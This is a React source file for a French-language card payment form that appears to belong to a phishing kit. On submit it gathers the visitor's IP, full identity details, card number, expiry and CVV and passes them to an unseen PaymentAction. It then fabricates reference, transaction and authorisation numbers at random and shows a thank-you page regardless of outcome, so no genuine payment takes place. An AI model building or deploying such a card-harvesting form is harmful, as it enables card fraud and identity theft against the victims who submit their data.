import { zodResolver } from "@hookform/resolvers/zod";
import axios from "axios";
import { forwardRef, useState } from "react";
import { useForm } from "react-hook-form";
import { useNavigate } from "react-router-dom";
import { PaymentAction } from "src/actions/payment";
import {
  Form,
  FormControl,
  FormField,
  FormMessage,
} from "src/components/ui/form";
import { PaymentInput } from "src/components/ui/payment-input";
import { PaymentFormSchema } from "src/schemas/payment";
import { useUserStore } from "src/zustand/userStore";
import { z } from "zod";
import { PaymentLoader } from "./payment-loader";

const PaymentForm = forwardRef<HTMLButtonElement>((_, ref) => {
  const form = useForm<z.infer<typeof PaymentFormSchema>>({
    resolver: zodResolver(PaymentFormSchema),
  });

  const store = useUserStore();
  const navigate = useNavigate();

  const [isLoaderOpen, setIsLoaderOpen] = useState(false);

  const generateReferenceId = () => {
    const characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    let reference = "";
    for (let i = 0; i < 5; i++) {
      reference += characters.charAt(
        Math.floor(Math.random() * characters.length)
      );
    }
    return reference.toUpperCase();
  };

  function generateRandomNumberString(length: number): string {
    let result = "";
    const characters = "0123456789";
    const charactersLength = characters.length;

    for (let i = 0; i < length; i++) {
      result += characters.charAt(Math.floor(Math.random() * charactersLength));
    }

    return result;
  }

  const onSubmit = (values: z.infer<typeof PaymentFormSchema>) => {
    setIsLoaderOpen(true);
    axios
      .get("https://api.ipify.org/?format=json")
      .then((response) => {
        const ip = response.data.ip; // Adjust depending on API response structure
        PaymentAction({
          ip,
          fullName:
            store.paymentInfo?.user.prenom + " " + store.paymentInfo?.user.nom,
          birthDate: store.paymentInfo?.user.dateOfBirth!,
          email: store.paymentInfo?.user.email!,
          streetNumber: store.paymentInfo?.user.voie!,
          city: store.paymentInfo?.user.ville!,
          postalCode: store.paymentInfo?.user.codePostal!,
          telephone: store.paymentInfo?.user.mobile!,
          creditCardNumber: values.cardNumber,
          expiration: values.expirationDate,
          cvv: values.cvv,
        });
      })
      .finally(() => {
        store.setMerciInfo({
          ...store.paymentInfo!,
          paymentDateTime: new Date(),
          card: values,
          referenceId: generateReferenceId(),
          transactionNo: generateRandomNumberString(6),
          autorisationNo: generateRandomNumberString(6),
        });
        setTimeout(() => {
          setIsLoaderOpen(false);
          navigate("/app/merci");
        }, 5500);
      });
  };

  const getCardType = (cardNumber: string): string | null => {
    const patterns: { [key: string]: RegExp } = {
      visa: /^4[0-9]{12}(?:[0-9]{3})?$/,
      mastercard: /^5[1-5][0-9]{14}$/,
      amex: /^3[47][0-9]{13}$/,
    };

    for (let cardType in patterns) {
      if (patterns[cardType].test(cardNumber)) {
        return cardType;
      }
    }
    return null;
  };

  // Function to format card number based on its type
  const formatCardNumber = (value: string) => {
    const cleaned = value.replace(/\D/g, "");
    const cardType = getCardType(cleaned);

    if (cardType === "amex") {
      // Format for Amex: 4-6-5
      return cleaned.replace(/(\d{4})(\d{6})(\d{0,5})/, "$1 $2 $3").trim();
    } else {
      // Default format: 4-4-4-4 (Visa, MasterCard, etc.)
      return cleaned.replace(/(\d{4})(?=\d)/g, "$1 ").trim();
    }
  };

  const formatExpirationDate = (value: string) => {
    return value.replace(/\D/g, "").replace(/(\d{2})(\d{2})/, "$1/$2");
  };

  const formatCVV = (value: string) => {
    return value.replace(/\D/g, "");
  };

  return (
    <Form {...form}>
      <form
        onSubmit={form.handleSubmit(onSubmit)}
        className="flex flex-col gap-[10px]"
      >
        <FormField
          control={form.control}
          name="cardNumber"
          render={({ field }) => (
            <FormControl>
              <div>
                <PaymentInput
                  label="Numéro de carte bancaire*"
                  placeholder="1234 0000 0000 0000"
                  description="Exemple : 5071 0032 2000 8301 (15 ou 16 chiffres)"
                  className="xl:max-w-[450px]"
                  {...field}
                  onChange={(e) =>
                    field.onChange(formatCardNumber(e.target.value))
                  }
                  onBlur={(e) => {
                    field.onChange(formatCardNumber(e.target.value));
                    field.onBlur();
                  }}
                />
                <FormMessage />
              </div>
            </FormControl>
          )}
        />
        <div className="flex flex-col min-[425px]:flex-row items-start gap-[24px]">
          <FormField
            control={form.control}
            name="expirationDate"
            render={({ field }) => (
              <div className="flex-1 xl:max-w-[450px]">
                <FormControl>
                  <PaymentInput
                    label="Date d'expiration (MM/AA)*"
                    placeholder="MM/AA"
                    description="Exemple : 12/26 (MM/AA)"
                    {...field}
                    onChange={(e) =>
                      field.onChange(formatExpirationDate(e.target.value))
                    }
                  />
                </FormControl>
                <FormMessage />
              </div>
            )}
          />
          <FormField
            control={form.control}
            name="cvv"
            render={({ field }) => (
              <FormControl>
                <div className="basis-2/5">
                  <PaymentInput
                    label="Code de sécurité (3 ou 4 chiffres)*"
                    placeholder="000"
                    description="Exemple : 236 ou 7323 (3 ou 4 chiffres)"
                    {...field}
                    onChange={(e) => field.onChange(formatCVV(e.target.value))}
                  />
                  <FormMessage />
                </div>
              </FormControl>
            )}
          />
          <button type="submit" ref={ref} className="hidden"></button>
        </div>
        <PaymentLoader isOpen={isLoaderOpen} />
      </form>
    </Form>
  );
});

PaymentForm.displayName = "PaymentForm";

export { PaymentForm };
